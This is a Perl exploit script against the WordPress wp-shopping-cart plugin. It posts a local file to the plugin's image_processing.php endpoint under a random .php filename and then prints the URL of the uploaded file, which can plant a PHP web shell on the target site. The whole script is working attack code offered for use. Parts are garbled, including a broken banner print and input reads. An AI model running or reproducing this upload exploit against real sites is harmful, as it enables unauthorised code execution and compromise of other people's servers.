#!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand(99999) . ".php"; # no int() print <); print "\nEnter File Path(path to local file to upload): "; chomp(my $file=); my $ua = LWP::UserAgent->new; my $re = $ua->request(POST $url . '/wp-content/plugins/wp-shopping-cart/image_processing.php', Content_Type => 'form-data', Content => [ Submit => "Add", image => [ $file, $fname, Content_Type => 'plain/text' ], ] ); die "Exploit Failed: HTTP POST Failed!" unless $re->is_success; if($re->content =~ /Fatal error/i) { print "Complete! To see if exploit was successfull visit the following URL for your uploaded file.\n"; print "Uploaded File: " . $url . "/wp-content/plugins/wp-shopping-cart/" . $fname . "\n"; } else { print "Exploit Failed! Target host not vulnerable!\n"; } exit;